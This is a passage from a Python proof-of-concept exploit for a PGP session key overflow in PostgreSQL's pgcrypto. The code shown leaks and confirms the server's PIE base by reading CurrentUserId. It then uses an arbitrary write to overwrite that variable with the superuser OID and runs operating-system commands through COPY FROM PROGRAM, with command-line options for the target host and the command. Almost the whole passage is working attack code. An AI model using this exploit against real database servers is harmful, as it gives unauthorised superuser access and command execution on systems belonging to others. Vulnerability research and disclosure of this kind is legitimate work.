expected_oid = query_expected_oid(conn_params)
print(f"### Expected CurrentUserId OID: {expected_oid}", file=sys.stderr)
# Stage 5: Validate PIE candidates by performing an arbitrary read of
# CurrentUserId at (candidate_base + current_user_offset). If the read
# value matches our session's known OID, we've found the correct base.
print(f"\n### === Stage 5: reading CurrentUserId to validate PIE base ===\n", file=sys.stderr)
confirmed_base = None
for base, _count in list(votes.items())[:5]:
confirmed_base = test_pie_candidate(rsa, conn_params, base,
current_user_offset, expected_oid)
if confirmed_base is not None:
break
if confirmed_base is None:
print(f"\n### WARNING: no candidate matched expected OID {expected_oid}", file=sys.stderr)
return
# Stage 6+7: Overwrite CurrentUserId to 10 (superuser OID) and execute command.
#
# We use target_addr = current_user_addr - 4 to account for SET_VARSIZE
# in pgp_pgsql.c:533-534 which writes the output bytea length into the
# first 4 bytes of the buffer. The decrypted data (p32(10) = OID 10,
# the bootstrap superuser ID) lands at current_user_addr, giving our
# session superuser privileges.
#
# Once CurrentUserId is overwritten, we can use COPY FROM PROGRAM to
# execute arbitrary shell commands on the PostgreSQL server.
print(f"\n### CONFIRMED PIE base: 0x{confirmed_base:016x}", file=sys.stderr)
current_user_addr = confirmed_base + current_user_offset
print(f"### CurrentUserId = 0x{current_user_addr:016x}", file=sys.stderr)
msg = build_arb_write_payload(rsa, leaked_ptr, current_user_addr - 0x4)
key = build_key_data(rsa)
sql = build_sql(msg, key)
conn = execute_sql(sql, conn_params, use_gdb=use_gdb, ret_conn=True)
cur = conn.cursor()
cur.execute("SELECT current_user::regrole::oid;")
changed_oid = cur.fetchone()[0]
print(f"### CurrentUserId OID Changed From {expected_oid}, To: {changed_oid}", file=sys.stderr)
print(f"### Executing: {cmd} ...", file=sys.stderr)
output = execute_privileged_command(conn, cmd)
print(output)
conn.close()
def main():
parser = argparse.ArgumentParser(description="PGP session key overflow PoC")
parser.add_argument('--dbname', help='PostgreSQL database to connect to')
parser.add_argument('--host', default='localhost', help='Database host')
parser.add_argument('--port', type=int, default=5432, help='Database port')
parser.add_argument('--user', default='postgres', help='Database user')
parser.add_argument('--password', default='', help='Database password')
parser.add_argument('--gdb', action='store_true',
help='Attach GDB in a tmux pane at the overflow')
parser.add_argument('--binary', default='/home/varik/projects/pg/pgsql/bin/postgres',
help='Path to postgres binary for symbol matching')
parser.add_argument('--cmd', default='id',
help='OS command to execute after successful exploit (default: id)')
args = parser.parse_args()
key_size = 3072
print(f"### Using RSA key size: {key_size} bits", file=sys.stderr)
rsa = generate_rsa_keypair(key_size)
conn_params = conn_params_from_args(args)
run_exploit(rsa, conn_params, args.binary, args.cmd, args.gdb)
if __name__ == "__main__":
main()